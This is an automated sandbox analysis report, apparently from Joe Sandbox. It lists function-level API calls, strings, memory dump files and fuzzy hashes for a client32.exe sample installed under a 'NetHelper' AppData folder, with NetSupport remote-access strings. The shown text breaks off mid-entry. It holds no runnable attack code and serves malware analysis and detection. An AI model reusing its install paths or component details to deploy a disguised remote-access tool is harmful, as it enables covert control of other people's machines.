                                                                                                                              0x00e31051
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00E31027
                                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 00E31081
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?), ref: 00E3109C
                                                                                                                              • ExitProcess.KERNEL32 ref: 00E310A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.827403044.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.827390548.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.827413930.0000000000E32000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_e30000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2164999147-0
                                                                                                                              • Opcode ID: 7fd198dd308e62f380f4bdfe4d8d9ca09a51c58ca14d219129a3e5083cc2a3f9
                                                                                                                              • Instruction ID: 098785db8e2cbe1795030ccca566846dcaed18d9f35cbb1d2041f175d99a36f6
                                                                                                                              • Opcode Fuzzy Hash: 7fd198dd308e62f380f4bdfe4d8d9ca09a51c58ca14d219129a3e5083cc2a3f9
                                                                                                                              • Instruction Fuzzy Hash: 3E01D665C043B596DB382B91890D37B7EB4AF10389F10909DFDC9B7181E7758CC9CAA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe, xrefs: 11144804, 11144812
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentFileModuleNameProcess
                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                                                                              • API String ID: 2251294070-2429964044
                                                                                                                              • Opcode ID: 70d3b457749a6e822e0e1169e9ddf0352d2b101ba94fd882fde1b7791f898c14
                                                                                                                              • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                                                              • Opcode Fuzzy Hash: 70d3b457749a6e822e0e1169e9ddf0352d2b101ba94fd882fde1b7791f898c14
                                                                                                                              • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110D0960 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __strdup
                                                                                                                              • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                                                              • API String ID: 838363481-1175285396
                                                                                                                              • Opcode ID: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
                                                                                                                              • Instruction ID: 29c62dc5338ff495c898086ff50a52fd619e2258fc3847dfd771a07a915be9b0
                                                                                                                              • Opcode Fuzzy Hash: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
                                                                                                                              • Instruction Fuzzy Hash: 95F028B5E003525BEA00DE6AB804A9BFBD89FC2298F44847AE8DDE7311E570B405C6D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 11110239
                                                                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                              • _memset.LIBCMT ref: 11110262
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                                              • String ID: ..\ctl32\Refcount.cpp
                                                                                                                              • API String ID: 2803934178-2363596943
                                                                                                                              • Opcode ID: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
                                                                                                                              • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                                                                              • Opcode Fuzzy Hash: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
                                                                                                                              • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 11015597
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 110155A8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                              • String ID: \\.\NSWFPDrv
                                                                                                                              • API String ID: 3498533004-85019792
                                                                                                                              • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                              • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                                                              • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                              • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _calloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1679841372-0
                                                                                                                              • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                                              • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                                                              • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                                              • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11110430 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InitializeCriticalSection.KERNEL32(111F1908,30AC22AD,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                                                              • EnterCriticalSection.KERNEL32(111F1908,30AC22AD,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                                                              • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3991485460-0
                                                                                                                              • Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                                                              • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                                                                              • Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                                                              • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                              • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                              Strings
                                                                                                                              • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenwvsprintf
                                                                                                                              • String ID: Error %d Opening regkey %s
                                                                                                                              • API String ID: 1772833024-3994271378
                                                                                                                              • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                              • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                                                              • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                              • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                              Strings
                                                                                                                              • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Closewvsprintf
                                                                                                                              • String ID: Error %d closing regkey %x
                                                                                                                              • API String ID: 843752472-892920262
                                                                                                                              • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                              • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                                                              • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                              • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101553E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID: nslsp.dll
                                                                                                                              • API String ID: 1029625771-3933918195
                                                                                                                              • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                              • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                                                                              • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                              • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1108A2E0 Relevance: 3.1, APIs: 2, Instructions: 101COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                              • std::exception::exception.LIBCMT ref: 1108A339
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 1108A34E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
